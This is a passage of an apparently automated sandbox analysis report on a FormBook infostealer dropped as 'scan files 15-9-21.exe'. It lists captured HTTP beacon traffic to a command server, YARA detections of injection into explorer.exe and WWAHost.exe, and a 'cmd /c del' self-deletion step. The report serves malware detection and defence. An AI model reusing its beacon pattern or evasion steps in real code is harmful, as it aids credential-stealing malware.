                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    4192.168.2.749784172.67.196.8480C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Sep 15, 2021 09:32:56.849651098 CEST5227OUTGET /mej0/?ZTSpa=RzUuUNIP5w6/jz6u/3nPHL71H0tFSqxvyYqd1E+XwjP7nDbVm/SW3vaLh5vwv8/S3nR/rxiqcA==&vP=JtCxKN HTTP/1.1
                                    Host: www.singularity.institute
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 15, 2021 09:32:56.879559040 CEST5228INHTTP/1.1 302 Moved Temporarily
                                    Date: Wed, 15 Sep 2021 07:32:56 GMT
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                    Location: http://www.ipeco.Net
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=w8%2FHxjcBpD8Y1io0Sqe7zWWFUrP4QrhN6avue%2BgpDzWcDnPanKzWA%2FH%2FzAMfH2zhpqDby4%2BE87vCH0bgKE1sB1un8ZbVIfPZc2SmU88qyI9e6qxG6MRtnT2IEAoca%2B%2B8rZIkrXPXDipj55op"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 68f029ff5c8f2bdd-FRA
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Code Manipulations

                                    Statistics

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Start time:09:30:56
                                    Start date:15/09/2021
                                    Path:C:\Users\user\Desktop\scan files 15-9-21.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Users\user\Desktop\scan files 15-9-21.exe'
                                    Imagebase:0x580000
                                    File size:569344 bytes
                                    MD5 hash:00E32D8A2CBD54E967BFC8F512086ECF
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    General

                                    Start time:09:30:59
                                    Start date:15/09/2021
                                    Path:C:\Users\user\Desktop\scan files 15-9-21.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\Desktop\scan files 15-9-21.exe
                                    Imagebase:0xfd0000
                                    File size:569344 bytes
                                    MD5 hash:00E32D8A2CBD54E967BFC8F512086ECF
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    General

                                    Start time:09:31:01
                                    Start date:15/09/2021
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0x7ff662bf0000
                                    File size:3933184 bytes
                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    General

                                    Start time:09:31:31
                                    Start date:15/09/2021
                                    Path:C:\Windows\SysWOW64\WWAHost.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WWAHost.exe
                                    Imagebase:0xb40000
                                    File size:829856 bytes
                                    MD5 hash:370C260333EB3149EF4E49C8F64652A0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:moderate

                                    General

                                    Start time:09:31:38
                                    Start date:15/09/2021
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del 'C:\Users\user\Desktop\scan files 15-9-21.exe'
                                    Imagebase:0x870000
                                    File size:232960 bytes
                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:09:31:39
                                    Start date:15/09/2021
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff774ee0000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Disassembly

                                    Code Analysis

                                    Reset < >